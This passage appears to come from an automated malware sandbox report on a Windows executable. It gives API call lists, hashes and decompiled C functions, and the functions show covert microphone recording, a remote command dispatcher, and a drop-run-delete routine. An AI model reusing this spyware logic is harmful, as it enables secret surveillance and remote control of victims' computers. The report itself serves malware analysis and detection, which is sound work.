                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                  • time.MSVCRT ref: 004124E5
                                  • srand.MSVCRT ref: 004124F2
                                  • rand.MSVCRT ref: 00412506
                                  • rand.MSVCRT ref: 0041251A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 3357298394-1277644989
                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B95B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                  • String ID: origmsc
                                  • API String ID: 643209241-68016026
                                  • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                  • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041290A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                  • String ID: ^"A
                                  • API String ID: 1083762089-1057680782
                                  • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                  • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411C4C, Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 15%
                                  			E00411C4C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _v36;
				char _v52;
				int _t21;
				signed int _t35;
				void* _t39;
				void* _t45;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t67 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
				_t21 = SetEvent( *(_t67 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t71 = _t69;
				_t45 = _t71;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t72 = _t71 + 0x24;
				_t61 =  *_t21 - 0x61;
				if(_t61 == 0) {
					_push(E0040180C( &_v20, __eflags, 2));
					_push(E0040180C( &_v20, __eflags, 1));
					_push(E0040180C( &_v20, __eflags, 0));
					_push(_t72 - 0x10);
					E00411D8A(E00412881(_t29));
				} else {
					_t62 = _t61 - 0x3d;
					if(_t62 == 0) {
						E00411A24(_t45);
					} else {
						_t63 = _t62 - 4;
						if(_t63 == 0) {
							_t35 = E0040180C( &_v20, __eflags, 0);
							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
							__eflags =  *_t35;
							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
						} else {
							_t64 = _t63 - 3;
							if(_t64 == 0) {
								_t39 =  *0x41c1d4;
								__eflags = _t39;
								if(_t39 != 0) {
									SetEvent(_t39);
								}
							} else {
								_t65 = _t64 - 1;
								if(_t65 == 0) {
									 *0x41c1d2 = 1;
								} else {
									if(_t65 == 1) {
										 *0x41c1d3 = 1;
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                  0x00411c4c
                                  0x00411c53
                                  0x00411c5e
                                  0x00411c6d
                                  0x00411c72
                                  0x00411c8a
                                  0x00411c9a
                                  0x00411ca0
                                  0x00411ca6
                                  0x00411ca9
                                  0x00411cb3
                                  0x00411cb8
                                  0x00411cbb
                                  0x00411cbe
                                  0x00411d3c
                                  0x00411d47
                                  0x00411d57
                                  0x00411d58
                                  0x00411d60
                                  0x00411cc0
                                  0x00411cc0
                                  0x00411cc3
                                  0x00411d2b
                                  0x00411cc5
                                  0x00411cc5
                                  0x00411cc8
                                  0x00411d03
                                  0x00411d0a
                                  0x00411d10
                                  0x00411d22
                                  0x00411cca
                                  0x00411cca
                                  0x00411ccd
                                  0x00411cee
                                  0x00411cf3
                                  0x00411cf5
                                  0x00411cf8
                                  0x00411cf8
                                  0x00411ccf
                                  0x00411ccf
                                  0x00411cd0
                                  0x00411ce5
                                  0x00411cd2
                                  0x00411cd3
                                  0x00411cd9
                                  0x00411cd9
                                  0x00411cd3
                                  0x00411cd0
                                  0x00411ccd
                                  0x00411cc8
                                  0x00411cc3
                                  0x00411d6b
                                  0x00411d73
                                  0x00411d7c
                                  0x00411d87

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                  • SetEvent.KERNEL32(?), ref: 00411C6D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00411C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • SetEvent.KERNEL32(?), ref: 00411CF8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                  • String ID:
                                  • API String ID: 3236006214-0
                                  • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                  • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401519, Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00401519(WCHAR* __eax, void* __eflags) {
				char* _t4;
				signed int _t5;
				CHAR* _t10;
				signed int _t11;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t26;
				void* _t27;

				_t27 = __eflags;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				CreateDirectoryW(__eax, 0);
				E0041B218.wFormatTag = 1;
				E0041B21A = 1;
				E0041B21C = 0x1f40;
				E0041B226 = 8;
				 *0x41b220 = 0x1f40;
				 *0x41b224 = 1;
				 *0x41b228 = 0;
				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t5 = atoi(_t4);
				_t19 = E0041B21C; // 0x0
				 *_t26 = 0x30008;
				_t20 = _t19 * _t5 * 0x3c;
				 *0x41b1d0 = _t20;
				 *0x41b1d8 = ((E0041B226 & 0x0000ffff) >> 3) * _t20;
				_t10 = waveInOpen( &E0041B210, 0xffffffff,  &E0041B218, E00401640, 0, ??);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				0x41b1a0->lpData = _t10;
				_t11 =  *0x41b1d8; // 0x0
				 *0x41b1a4 = _t11;
				 *0x41b1a8 = 0;
				 *0x41b1ac = 0;
				 *0x41b1b0 = 0;
				 *0x41b1b4 = 0;
				waveInPrepareHeader(E0041B210, 0x41b1a0, 0x20);
				waveInAddBuffer(E0041B210, 0x41b1a0, 0x20);
				waveInStart(E0041B210);
				return 0;
			}











                                  0x00401519
                                  0x00401523
                                  0x0040152a
                                  0x0040153c
                                  0x00401545
                                  0x0040154e
                                  0x00401553
                                  0x0040155c
                                  0x00401561
                                  0x0040156a
                                  0x00401571
                                  0x00401578
                                  0x0040157f
                                  0x00401588
                                  0x0040158e
                                  0x00401595
                                  0x004015b7
                                  0x004015bd
                                  0x004015c2
                                  0x004015d5
                                  0x004015dd
                                  0x004015eb
                                  0x004015f0
                                  0x004015fb
                                  0x00401600
                                  0x00401606
                                  0x0040160c
                                  0x00401612
                                  0x00401618
                                  0x00401627
                                  0x00401633
                                  0x0040163d

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                  • atoi.MSVCRT ref: 0040157F
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                  • waveInStart.WINMM ref: 00401633
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 1097200658-0
                                  • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                  • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F153, Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                  • SetEvent.KERNEL32(?), ref: 0040F16D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040F18E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                    • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                    • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                    • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                    • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                    • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                    • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                    • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                    • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
